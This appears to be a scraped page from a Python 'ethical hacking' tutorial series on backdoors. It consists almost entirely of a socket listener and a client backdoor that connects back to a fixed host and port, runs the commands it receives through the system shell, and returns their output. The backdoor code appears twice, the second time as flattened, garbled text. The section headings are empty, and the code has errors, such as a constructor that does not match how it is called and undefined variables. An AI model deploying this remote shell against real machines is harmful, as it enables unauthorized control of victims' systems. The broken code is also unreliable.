Python Ethical Hacking - BACKDOORS(3)
BACKDOORS Sockets Problem:
Solution:
BACKDOORS Serialization Benefits:
Implementation:
? ? ?Server Side - Listener Code: #!/usr/bin/env python import socket import json class Listener: def __init__(self,ip,port): listener = socket.socket(socket.AF_INET,socket.SOCK_STREAM) listener.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) listener.bind((ip,port)) listener.listen(0) print("[+] Waiting for incoming connections") self.connection,address = listener.accept() print("[+] Got a connection from " + str(address)) def reliable_send(self,data): json_data = json.dumps(data).encode() self.connection.send(json_data) def reliable_receive(self): json_data = "" while True: try: json_data = json_data + self.connection.recv(1024).decode() return json.loads(json_data) except ValueError: continue def execute_remotely(self,command): self.reliable_send(command.decode()) return self.reliable_receive() def run(self): while True: command = input(">> ").encode() result = self.execute_remotely(command) print(result) my_listener = Listener("10.0.0.43",4444) my_listener.run() Client Side - Backdoor code: #!/usr/bin/env python import json import socket import subprocess class Backdoor: def __init__(self,port): self.connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM) self.connection.connect((ip,port)) def reliable_send(self,data): json_data = json.dumps(data).encode() self.connection.send(json_data) def reliable_receive(self): json_data = "" while True: try: json_data = json_data + self.connection.recv(1024).decode() return json.loads(json_data) except ValueError: continue def execute_system_command(self,command): return subprocess.check_output(command,shell=True) def run(self): while True: command = self.reliable_receive() command_result = self.execute_system_command(command) self.reliable_send(command_result.decode()) connection.close() my_backdoor = Backdoor("10.0.0.43",4444) my_backdoor.run() Execute result: ? ? #!/usr/bin/env pythonimport jsonimport socketimport subprocessclass Backdoor:? ? def __init__(self,port):? ? ? ? self.connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)? ? ? ? self.connection.connect((ip,port))? ? def reliable_send(self,data):? ? ? ? json_data = json.dumps(data).encode()? ? ? ? self.connection.send(json_data)? ? def reliable_receive(self):? ? ? ? json_data = ""? ? ? ? while True:? ? ? ? ? ? try:? ? ? ? ? ? ? ? json_data = json_data + self.connection.recv(1024).decode()? ? ? ? ? ? ? ? return json.loads(json_data)? ? ? ? ? ? except ValueError:? ? ? ? ? ? ? ? continue? ? def execute_system_command(self,command):? ? ? ? return subprocess.check_output(command,shell=True)? ? def run(self):? ? ? ? while True:? ? ? ? ? ? command = self.reliable_receive()? ? ? ? ? ? command_result = self.execute_system_command(command)? ? ? ? ? ? self.reliable_send(command_result.decode())? ? ? ? connection.close()my_backdoor = Backdoor("10.0.0.43",4444)my_backdoor.run() (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |